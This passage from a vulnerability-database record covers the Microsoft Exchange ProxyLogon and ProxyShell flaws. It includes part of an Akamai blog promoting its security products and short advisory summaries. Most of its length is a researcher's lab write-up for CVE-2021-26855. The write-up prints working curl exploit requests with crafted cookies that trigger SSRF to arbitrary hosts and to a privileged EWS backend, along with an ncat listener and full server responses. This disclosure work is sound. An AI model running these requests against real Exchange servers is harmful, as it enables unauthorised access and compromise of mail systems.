web application firewall (WAF), which can stop potentially malicious payloads targeted at vulnerable Microsoft Exchange servers. In other words, Akamai's WAF can block the malicious payload destined for a potentially unpatched system. Clearly, this does not replace patching in the long run, but can buy precious time for IT teams. 
\n\nIf you are interested in learning more about Akamai's WAF-related Microsoft Exchange server zero-day mitigations, read [How Akamai Can Help You Fight the Latest Exploitation Attempts Against Microsoft Exchange](<https://blogs.akamai.com/2021/03/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html>).\n\nThese incidents also raise the larger question: What should and shouldn't be exposed to the public internet?\n\nThat question takes me back to an appropriately titled Gartner report from 2016 called [\"It's Time to Isolate Your Services From the Internet Cesspool\"](<https://www.gartner.com/en/documents/3463617/it-s-time-to-isolate-your-services-from-the-internet-ces>) that gives some pretty clear guidance on that front. The answer is fairly simple: only expose to the internet what you absolutely have to; and for those services, make sure the appropriate security controls are in place.\n\nThat brings me to the second piece of major news, the Verkada hack. \n\nAs with most breaches, there are still a lot of open questions and conjecture, but what has emerged suggests that [exposing a Jenkins server on the public internet is quite risky](<https://arstechnica.com/information-technology/2021/03/hackers-access-security-cameras-inside-cloudflare-jails-and-hospitals/>). Combine that with the well-understood tactics, techniques, and procedures of most threat actors to obtain system access and use that initial access to pivot to other resources on the network, and you have a recipe for even more risk.\n\nEither way, in both of these cases restricting access to a vulnerable Exchange or Jenkins server through some form of intelligent access control can stop threat actors from reaching resources directly. 
[I am partial to Zero Trust Network Access](<https://www.akamai.com/us/en/campaign/assets/reports/gartner-2020-market-guide-for-zero-trust-network-access.jsp>) (ZTNA) approaches that limit who can send malicious payloads targeted at the vulnerable systems. Obviously, this doesn't remove the vulnerability, but restricting access to a potentially vulnerable server through ZTNA can stop any malicious actors from reaching it directly. \n\n[](<https://blogs.akamai.com/Microsoft%20Image2.png>)\n\nIf external actors can't reach a vulnerable system directly, they need to redirect their efforts to reaching it through impersonating an actual end user, which becomes increasingly difficult with the use of contextual, adaptive, and identity aware access controls, such as ZTNA reinforced with FIDO2-compliant multi-factor authentication. Combine those access controls with an inline WAF and a positive picture emerges. Control who has access and inspect traffic flows for anything malicious, even for users who have control.\n\nThe bottom line: Both of these incidents highlight the need to [move to a zero trust-based security model](<https://www.akamai.com/us/en/solutions/security/zero-trust-security-model.jsp>). \n\nIf you are interested in learning more, I suggest you start with [Akamai Secure Access Service Edge](<https://www.akamai.com/sase>) and our [Enterprise Defender solution](<https://www.akamai.com/us/en/multimedia/documents/product-brief/enterprise-defender-product-brief.pdf>), which combines ZTNA, Secure Web Gateway, Web Application Firewall, and application acceleration as one simple-to-consume security service delivered at the Akamai edge.\n\nIsn't it time to effectively isolate apps and APIs from the internet? 
\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-15T22:15:00", "type": "akamaiblog", "title": "Microsoft Exchange and Verkada Hacks: Isolate Your Apps and APIs from the Internet Cesspool", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-2706"], "modified": "2021-03-15T21:50:30", "id": "AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/qbi2avdhkGQ/microsoft-exchange-and-verkada-hacks-isolate-your-apps-and-apis-from-the-internet-cesspool.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2021-03-10T14:27:54", "description": "Microsoft released patches for four vulnerabilities in Exchange Server on March 2, disclosing that these vulnerabilities were being exploited by a previously unknown threat actor, referred to as HAFNIUM. 
The vulnerabilities in question \u2014 CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065 \u2014 affect Microsoft Exchange Server 2019, 2016, 2013 and the out-of-support Microsoft Exchange Server 2010. The patches for these vulnerabilities should be applied as soon as possible. Microsoft... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "cvss3": {}, "published": "2021-03-08T10:18:43", "type": "talosblog", "title": "Threat Advisory: HAFNIUM and Microsoft Exchange zero-day", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-08T10:18:43", "id": "TALOSBLOG:AC8ED8970F5692A325A10D93B7F0D965", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/YIQrIoqvPyk/threat-advisory-hafnium-and-microsoft.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-18T16:43:28", "description": "Microsoft disclosed four actively exploited zero-day vulnerabilities being used to attack on-premises versions of Microsoft Exchange Server. The vulnerabilities identified are CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which affect Microsoft Exchange Server. Exchange Online is not affected.\n\nIn the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. 
Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at March 03, 2021 4:10pm UTC reported:\n\nMicrosoft [released details](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on an active state-sponsored threat campaign (attributed to HAFNIUM) that is exploiting on-prem Exchange Server installations. Microsoft\u2019s observation was that these were limited, targeted attacks, but as of March 3, 2021, ongoing mass exploitation has been confirmed by multiple sources. More in the [Rapid7 analysis](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=assessment#rapid7-analysis>) tab.\n\n**NinjaOperator** at June 29, 2021 9:51pm UTC reported:\n\nMicrosoft [released details](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on an active state-sponsored threat campaign (attributed to HAFNIUM) that is exploiting on-prem Exchange Server installations. Microsoft\u2019s observation was that these were limited, targeted attacks, but as of March 3, 2021, ongoing mass exploitation has been confirmed by multiple sources. 
More in the [Rapid7 analysis](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=assessment#rapid7-analysis>) tab.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T00:00:00", "type": "attackerkb", "title": "Multiple Microsoft Exchange zero-day vulnerabilities - ProxyLogon Exploit Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-09T00:00:00", "id": "AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2", "href": "https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---proxylogon-exploit-chain", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-25T18:06:52", "description": "ProxyShell is an exploit chain targeting on-premise installations of Microsoft Exchange Server. 
It was demonstrated by Orange Tsai at Pwn2Own in April 2021 and is comprised of three CVEs that, when chained, allow a remote unauthenticated attacker to execute arbitrary code on vulnerable targets. The three CVEs are CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.\n\nDetails are available in Orange Tsai\u2019s [Black Hat USA 2020 talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>) and follow-on [blog series](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>). ProxyShell is being broadly exploited in the wild as of August 12, 2021.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at August 12, 2021 9:19pm UTC reported:\n\nCheck out the [Rapid7 analysis](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>) for details on the exploit chain. Seems like a lot of the PoC implementations so far are using admin mailboxes, but I\u2019d imagine folks are going to start finding ways around that soon.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-20T00:00:00", "type": "attackerkb", "title": "ProxyShell Exploit Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T00:00:00", "id": "AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "href": "https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:43:32", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 09, 2021 7:01am UTC reported:\n\n# CVE-2021-26855\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is an SSRF vulnerability in Exchange that allows privileged access to Exchange\u2019s backend resources, ultimately leading to pre-auth RCE when [combined](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) with CVEs such as [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>).\n\n## Microsoft\u2019s (Nmap) NSE script\n\nConveniently disclosed in Microsoft\u2019s [alternative mitigations](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>), [this script](<https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse>) provides an easily reproducible PoC for CVE-2021-26855. My findings below are reflective of that.\n \n \n wvu@kharak:~/Downloads$ ls\n http-vuln-cve2021-26855.nse\n wvu@kharak:~/Downloads$ nmap -Pn -T4 -n -v -p 443 --open --script http-vuln-cve2021-26855 192.168.123.183\n Host discovery disabled (-Pn). 
All addresses will be marked 'up' and scan times will be slower.\n Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 00:50 CST\n NSE: Loaded 1 scripts for scanning.\n NSE: Script Pre-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Initiating Connect Scan at 00:50\n Scanning 192.168.123.183 [1 port]\n Discovered open port 443/tcp on 192.168.123.183\n Completed Connect Scan at 00:50, 0.00s elapsed (1 total ports)\n NSE: Script scanning 192.168.123.183.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.02s elapsed\n Nmap scan report for 192.168.123.183\n Host is up (0.00064s latency).\n \n PORT STATE SERVICE\n 443/tcp open https\n | http-vuln-cve2021-26855:\n | VULNERABLE:\n | Exchange Server SSRF Vulnerability\n | State: VULNERABLE\n | IDs: CVE:CVE-2021-26855\n | Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010 are vulnerable to a SSRF via the X-AnonResource-Backend and X-BEResource cookies.\n |\n | Disclosure date: 2021-03-02\n | References:\n | https://vulners.com/cve/CVE-2021-26855\n |_ http://aka.ms/exchangevulns\n \n NSE: Script Post-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Read data files from: /usr/local/bin/../share/nmap\n Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds\n wvu@kharak:~/Downloads$\n \n\n### Ported to [curl(1)](<https://curl.se/>)\u2026\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\" https://192.168.123.183/owa/auth/x.js\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client 
hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f8cb580b400)\n > GET /owa/auth/x.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 500\n < cache-control: private\n < content-type: text/html; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: 864475e3-ee01-48a5-acf3-1b1cbbc50c02\n < x-calculatedbetarget: localhost\n < x-calculatedbetarget: localhost\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 06:52:07 GMT\n < content-length: 85\n <\n * Connection #0 to host 192.168.123.183 left intact\n NegotiateSecurityContext failed with for host 'localhost' with status 'TargetUnknown'* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to an 
arbitrary remote host\n\nYou can specify an arbitrary host in `X-AnonResource-Backend`.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f9ea080d600)\n > GET /owa/auth/22702.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n \n\n### Catching the request in [ncat(1)](<https://nmap.org/ncat/>)\u2026\n \n \n wvu@kharak:~$ ncat -lkv --ssl 
443\n Ncat: Version 7.91 ( https://nmap.org/ncat )\n Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.\n Ncat: SHA-1 fingerprint: F55B E690 D8F2 84F1 EC64 816A 5763 2F5B B56F 0D72\n Ncat: Listening on :::443\n Ncat: Listening on 0.0.0.0:443\n Ncat: Connection from 192.168.123.183.\n Ncat: Connection from 192.168.123.183:6303.\n GET /owa/auth/22702.js HTTP/1.1\n X-FE-ClientIP: 192.168.123.1\n X-Forwarded-For: 192.168.123.1\n X-Forwarded-Port: 55723\n X-MS-EdgeIP:\n X-ExCompId: ClientAccessFrontEnd\n Accept: */*\n User-Agent: curl/7.64.1\n X-OriginalRequestHost: 192.168.123.183\n X-OriginalRequestHostSchemePort: 443:https:192.168.123.183\n X-MSExchangeActivityCtx: V=1.0.0.0;Id=26678ebf-2d0f-42bd-bac3-2d27889baed8;C=;P=\n msExchProxyUri: https://192.168.123.183/owa/auth/22702.js\n X-IsFromCafe: 1\n X-SourceCafeServer: WIN-T4RO9496TA7.GIBSON.LOCAL\n X-CommonAccessToken: VgEAVAlBbm9ueW1vdXNDAEUAAAAA\n X-vDirObjectId: 621dccd3-6dff-49aa-87be-7911a110125e\n Host: 192.168.123.1\n Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n Connection: Keep-Alive\n \n\nThe fun folks working on the [Nuclei scanner](<https://github.com/projectdiscovery/nuclei>) noticed [burpcollaborator.net](<https://burpcollaborator.net/>) made a [good target](<https://github.com/projectdiscovery/nuclei-templates/pull/1032>) for their scanner.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS 
handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fd58480f600)\n > GET /owa/auth/18409.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~31368\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html\n < server: Microsoft-IIS/10.0\n < request-id: 31688df5-982d-4d18-86d1-ae0e99c00ce8\n < x-calculatedbetarget: burpcollaborator.net\n < x-collaborator-version: 4\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 07:58:52 GMT\n < content-length: 1190\n <\n <!DOCTYPE html>\n <html>\n <head>\n <meta charset=\"UTF-8\">\n </head>\n <body>\n <h1>Burp Collaborator Server</h1>\n <p>Burp Collaborator is a service that is used by <a href=\"https://portswigger.net/burp/\">Burp Suite</a> when testing web applications for security\n vulnerabilities. 
Some of Burp Suite's tests may cause the application being\n tested to interact with the Burp Collaborator server, to enable Burp Suite\n to detect various security vulnerabilities.\n </p><p>The Burp Collaborator server does not itself initiate any interactions with\n any system, and only responds to interactions that it receives from other\n systems.\n </p><p>If you are a systems administrator and you are seeing interactions with the\n Burp Collaborator server in your logs, then it is likely that someone is\n testing your web application using Burp Suite. If you are trying to identify\n the person responsible for this testing, you should review your web server\n or applications logs for the time at which these interactions were initiated\n by your systems.\n </p><p>For further details about Burp Collaborator, please see the <a href=\"https://portswigger.net/burp/documentation/collaborator/\">full documentation</a>.</p></body>\n * Connection #0 to host 192.168.123.183 left intact\n </html>* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to a privileged backend resource\n\nHostname `WIN-T4RO9496TA7` is from the `x-feserver` header.\n \n \n wvu@kharak:~$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~$RANDOM\" \"https://192.168.123.183/ecp/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 
(IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7faac2808200)\n > GET /ecp/1849.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~22406\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html; charset=UTF-8\n < server: Microsoft-IIS/10.0\n < request-id: b4762a11-d418-43f8-a435-f04420289a4c\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: exchangecookie=ef4d50599057429b849b92e9059455af; expires=Wed, 09-Mar-2022 07:00:11 GMT; path=/; HttpOnly\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s/Gq8/Ixc7Pxc7O; expires=Tue, 09-Mar-2021 07:10:11 GMT; path=/EWS; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Tue, 09 Mar 2021 07:00:11 GMT\n < content-length: 2836\n <\n <HTML lang=\"en\"><HEAD><link rel=\"alternate\" type=\"text/xml\" href=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Exchange.asmx?disco\"/><STYLE type=\"text/css\">#content{ FONT-SIZE: 0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: 
30px}BODY{MARGIN-TOP: 0px; MARGIN-LEFT: 0px; COLOR: #000000; FONT-FAMILY: Verdana; BACKGROUND-COLOR: white}P{MARGIN-TOP: 0px; MARGIN-BOTTOM: 12px; COLOR: #000000; FONT-FAMILY: Verdana}PRE{BORDER-RIGHT: #f0f0e0 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #f0f0e0 1px solid; MARGIN-TOP: -5px; PADDING-LEFT: 5px; FONT-SIZE: 1.2em; PADDING-BOTTOM: 5px; BORDER-LEFT: #f0f0e0 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #f0f0e0 1px solid; FONT-FAMILY: Courier New; BACKGROUND-COLOR: #e5e5cc}.heading1{MARGIN-TOP: 0px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 26px; MARGIN-BOTTOM: 0px; PADDING-BOTTOM: 3px; MARGIN-LEFT: -30px; WIDTH: 100%; COLOR: #ffffff; PADDING-TOP: 10px; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #003366}.intro{display: block; font-size: 1em;}</STYLE><TITLE>Service</TITLE></HEAD><BODY><DIV id="content" role="main"><h1 class="heading1">Service</h1><BR/><P class="intro">You have created a service.<P class='intro'>To test this service, you will need to create a client and use it to call the service. You can do this using the svcutil.exe tool from the command line with the following syntax:</P> <BR/><PRE>svcutil.exe <A HREF="https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl">https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl</A></PRE></P><P class="intro">This will generate a configuration file and a code file that contains the client class. Add the two files to your client application and use the generated client class to call the Service. For example:<BR/></P><h2 class='intro'>C#</h2><br /><PRE><font color="blue">class </font><font color="black">Test
</font>{
<font color="blue"> static void </font>Main()
{
<font color="black">HelloClient</font> client = <font color="blue">new </font><font color="black">HelloClient</font>();

